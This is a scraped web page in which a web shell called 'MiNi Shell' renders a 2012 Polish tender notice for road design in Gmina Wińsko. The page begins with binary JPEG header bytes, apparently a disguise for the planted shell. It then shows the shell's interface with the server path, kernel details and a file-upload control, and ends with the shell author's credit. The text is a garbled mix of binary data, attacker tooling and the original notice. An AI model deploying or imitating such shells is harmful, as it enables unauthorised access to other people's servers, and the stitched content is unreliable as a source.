JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/129814-N-2012.html

<p class="kh_header"><b>Wińsko: Wykonanie projektu budowlanego wykonawczego na budowę dróg dojazdowych do gruntów rolnych Stryjno-Głębowice</b><br>
<b>Numer ogłoszenia: 129814 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wińsko , Plac Wolności 2, 56-160 Wińsko, woj. dolnośląskie, tel. 071 3898186, faks 071 3898366.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.winsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu budowlanego wykonawczego na budowę dróg dojazdowych do gruntów rolnych Stryjno-Głębowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia: 
	Wykonanie projektu budowlanego wykonawczego wraz z prowadzeniem  stałego nadzoru autorskiego na budowę gminnych dróg prowadzących do gruntów rolnych oraz łączących miejscowości Stryjno dz. nr 187 Brzózkę dz. nr 111, 203, 120 i Głębowice dz. nr 392.5. Stan istniejący przedstawia się następująco. Projektowane dwa odcinki dróg tj. Stryjno   Brzózka oraz Brzózka  Głębowice  rozpoczynają się i kończą drogami Powiatowymi i mają łącznie długość ok. 10 km, szerokość ok. 4m, wzdłuż dróg przebiegają rowy, znajdują się  2 przepusty i 2 obiekty mostowe, droga jest drogą gruntową, częściowo utwardzoną. 
	Projekt należy wykonać w oparciu o następujące założenia:
	
	kategoria ruchu   droga gminna klasa L
	szerokość jezdni 4m lub 5m  do uzgodnienia z zamawiającym na etapie koncepcji
	utwardzenie poboczy
	odwodnienie istniejące i projektowane rowy przydrożne
	przebudowa przepustów i obiektów mostowych w razie konieczności
	zaprojektować w miarę potrzeb tzw. mijanki
	zaprojektować drogę asfaltową 
	roboty nawierzchniowe, 
	podbudowa, 
	kompleksowe oznakowanie i urządzenia bezpieczeństwa ruchu drogowego, 
	kategoria obciążenia ruchem KR1

	Zamawiający wymaga aby wykonawca zadania wykonał w wyznaczonym terminie projekt koncepcyjny i przedstawił do zaakceptowania zamawiającemu. Zamówienie obejmuje również wystąpienie w imieniu zamawiającego przez wykonawcę i uzyskanie pozwolenia na budowę dróg.
	Zamawiający zobowiązuje wykonawcę do zapoznania się ze stanem faktycznym poprzez przeprowadzenie wizji lokalnej na terenie realizacji projektu i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazanych w ramach niniejszego postępowania przetargowego.
	Zamawiający zastrzega sobie prawo do systematycznego wglądu do prac projektowych. Wykonawca zobowiązany jest do regularnej tj. co 2 tygodnie konsultowania z zamawiającym wszystkich istotnych rozwiązań projektowych. Dla przyjętych rozwiązań konstrukcyjnych należy uzyskać zgodą zamawiającego.

	Zakres zamówienia obejmuje
Zakres opracowania i wystąpień Wykonawcy związanych z opracowaniem dokumentacji projektowej obejmuje

a.	projekt koncepcyjny opracowany do końca sierpnia 2012r.musi zawierać usytuowanie drogi w planie 
b.	projekt budowlany
c.	projekt wykonawczy.
d.	Projekty stałej organizacji ruchu drogowego  zatwierdzone przez organ   zarządzający ruchem 
e.	Wystąpienie o decyzję o środowiskowych uwarunkowaniach Inwestycji
f.	Wykonanie badan geotechnicznych podłoża gruntowego, Opracowanie dokumentacji geologiczno  inżynierskiej badania gruntowo  wodne
g.	Opracowanie operatów wodno   prawnych dla budowy przebudowy przepustów i mostów
h.	projekt docelowej organizacji ruchu
i.	ewentualnie projekty branżowe usunięcia kolizji zakres usunięcia ewentualnych kolizji przedstawić do akceptacji przez UG
j.	decyzje ustalenia lokalizacji celu publicznego, wypis z rejestru gruntów
k.	Sporządzenie informacji bezpieczeństwa i ochrony zdrowia  BIOZ
l.	Zabezpieczenie i aktualizacja mapy zasadniczej do celów projektowych w skali 1 1000   wg potrzeb projektującego. 
Projekt budowlany musi zawierać wszystkie elementy pozwalające uzyskać pozwolenie na budowę. 

Projekt budowlany i wykonawczy musi zawierać
	część opisowo bliczeniową
	opis techniczny
	wszystkie niezbędne obliczenia

	Część kosztorysową
	kosztorys inwestorski
	przedmiar robót

	Część rysunkową 
	plan orientacyjny
	plan sytuacyjny podkłady geodezyjne 1 500 mapa numeryczna
	przekroje podłużne
	przekroje poprzeczne
	przekroje normalne
	szczegóły
Wykonawca dokumentacji przekaże zmawiającemu całość opracowań w formie elektronicznej na nośnikach cyfrowych. Zarchiwizowana na płycie DVD  dokumentacja projektowa służąca do opisu przedmiotu zamówienia musi być  tożsama z wersją pisemną papierową. Wykonawca dokumentacji odpowiada za zgodność wersji elektronicznej z opracowaniem pisemnym papierowym.
2.3.	Zamówienie obejmuje również wykonanie części przetargowej opracowanej oddzielnie  która musi zawierać następujące opracowania

	Dokumentacja projektowa.
Dokumentacje projektową należy sporządzić zgodnie z rozporządzeniem Ministra infrastruktury z dnia 02 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego Dz. U. nr202 z 16 września 2004r.
	Szczegółowe Specyfikacje Techniczne
SST należy sporządzić dla zadania objętego zamówieniem w formie i na podstawie OST przygotowanych przez Branżowy Zakład Doświadczalny Budownictwa Drogowego i Mostowego Sp. z o.o. oraz zgodnie z rozporządzeniem Ministra infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego Dz. U. nr 202 z 16 września 2004r w formie umożliwiającej dalsze ich powielanie
Wszystkie zapisy dotyczące warunków kontraktu z przyszłym wykonawcą robót umieszczone w szczegółowych warunkach specyfikacji technicznych muszą uzyskać akceptację zamawiającego.
Kosztorys inwestorski
Kosztorys inwestorski sporządzony na podstawie ww SST, zgodnie z rozporządzeniem Ministra Infrastruktury z 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenie kosztorysu inwestorskiego, obliczenia planowanych kosztów praz projektowych oraz planowanych kosztorysów robót budowlanych określonych w programie funkcjonalno użytkowym Dz. U. nr 130 z 8 czerwca 2004r.
Kosztorys inwestorski musi być sporządzony w oparciu o szczegółowe specyfikacje techniczne. Pozycje kosztorysu inwestorskiego muszą być zgodne z pozycjami w kosztorysie ofertowym i przedmiarze robót
Kosztorys ofertowy
Kosztorys ofertowy musi być sporządzony w oparciu o szczegółowe specyfikacje techniczne


2.4.	Wykonawca dokumentacji projektowej zobowiązany jest do wykonania jej zgodnie z wymaganiami ustawy z 7 lipca 1994r Prawo budowlane Dz. U. z 2006r. Nr 156 poz. 1118 ze zm., oraz aktami wykonawczymi  do ustawy zawartymi w rozporządzeniach z uwzględnieniem obowiązujących norm jakościowych i technologicznych a w szczególności  
	Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie Dz. U. z 1999r Nr 43 poz. 430 z późn. zm. 
Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie Dz. U. z 2000r Nr 63 poz. 735 z późn. zm. 
	Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych  oraz programu funkcjonalno- użytkowego Dz. U. z 2004 r Nr 202 poz. 2072 z późn. zm. 
	Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004r w sprawie metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno  użytkowym Dz. U. z 2004r Nr 130 poz. 1389.

Część przetargową należy przygotować oddzielnie w formie papierowej dokumentacja projektowa szt.3, SST 3 szt., kosztorys inwestorski  3 szt. 
Ponadto kosztorys inwestorski oraz SST należy przygotować w formie elektronicznej umożliwiającej dokonywanie zmian wymagane pliki typu MS OFFICE Word i Exel. Dokumentację projektową oraz szczegółowe specyfikacje techniczne należy opracować dodatkowo w formie elektronicznej w plikach które umożliwiają dokonywanie jakichkolwiek zmian np. pliki typu PDF, AutoCad. Całą część przetargową zapisana na płycie CD należy przekazać zamawiającemu.
Projekt budowlany i wykonawczy z wyjątkiem części przetargowej należy opracować w 5 egzemplarzach TOM I odcinek Stryjno Brzózka TOM II odcinek Brzózka Głbowice

Projekt koncepcyjny należy wykonać w 2 egzemplarzach.

Uwaga
Opracowana dokumentacja projektowa wraz ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych oraz przedmiarami, będzie służyła do opisania przedmiotu zamówienia w przetargu na roboty budowlane. Na Wykonawcy dokumentacji spoczywa więc obowiązek sporządzenia tych opracowań robót zgodnie z art. 29 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tzn., że przedmiot zamówienia winien być opisany w sposób jednoznaczny i wyczerpujący, za pomocą dostatecznie dokładnych i zrozumiałych określeń lecz bez wskazywania znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfiką przedmiotu zamówienia lub nie można opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń  wtedy wskazaniu takiemu winny towarzyszyć wyrazy lub równoważny. 
W takim przypadku w opisie powinny znaleźć się określenia precyzujące wymogi w odniesieniu do dopuszczalnego zakresu równoważności.
Zapis powyższy zostanie naruszony, gdy przy opisie przedmiotu zamówienia Wykonawca użyje oznaczeń czy parametrów wskazujących konkretnego producenta dostawcę lub konkretny produkt, działając w ten sposób wbrew zasadzie obiektywizmu, równego traktowania wszystkich podmiotów ubiegających się o udzielenie zamówienia na realizację zaprojektowanego zadania oraz zasadzie uczciwej konkurencji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania specjalnych uprawnień projektowych oraz aktualnych zaświadczeń o przynależności do właściwych izb samorządu zawodowego (ważne na dzień otwarcia ofert)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej dwóch dokumentacji  
          projektowych na budowę lub przebudowę dróg minimum klasy L o długości minimum 10 km w 
          okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia 
         działalności jest krótszy  w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca zadania udokumentuje, że dysponuje lub będzie dysponował osoba zdolna do wykonania zamówienia. Potencjalny projektant branży drogowej musi posiadać uprawnienia bez ograniczeń do projektowania dróg oraz musi posiadać doświadczenie zawodowe. Osoba ta powinna w ciągu ostatnich 3 lat wykonać co najmniej jedna dokumentację projektową, której przedmiotem było wykonanie projektu budowlanowykonawczego z zakresu budowy/przebudowy drogi klasy minimum L.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy  wypełniony i podpisany przez wykonawcę 
2. Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych. 
3. Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych 
4 Wykaz osób do kontaktów z zamawiającym 
5 Wzór umowy  parafowany przez wykonawcę 
6. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat licząc od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie. Wymagane jest wykazanie przez wykonawcę realizacji co najmniej dwóch dokumentacji  
projektowych na budowę lub przebudowę dróg minimum klasy L o długości minimum 10 km w  okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia 
działalności jest krótszy  w tym okresie. 
7. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, niezależnie od tego, czy są one zatrudnione bezpośrednio przez wykonawcę, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności..  Warunek ten zostanie spełniony jeżeli wykonawca zadania udokumentuje, że dysponuje lub będzie dysponował osoba zdolna do wykonania zamówienia. Potencjalny projektant branży drogowej musi posiadać uprawnienia bez ograniczeń do projektowania dróg oraz musi posiadać doświadczenie zawodowe. Osoba ta powinna w ciągu ostatnich 3 lat wykonać co najmniej jedna dokumentację projektową, której przedmiotem było wykonanie projektu budowlano-wykonawczego z zakresu budowy/przebudowy drogi klasy minimum L.

8. Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.winsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wińsko pl. Wolności 2, 56-160 Wińsko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2012 godzina 10:00, miejsce: Urząd Gminy Wińsko pl. Wolności 2, 56-160 Wińsko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com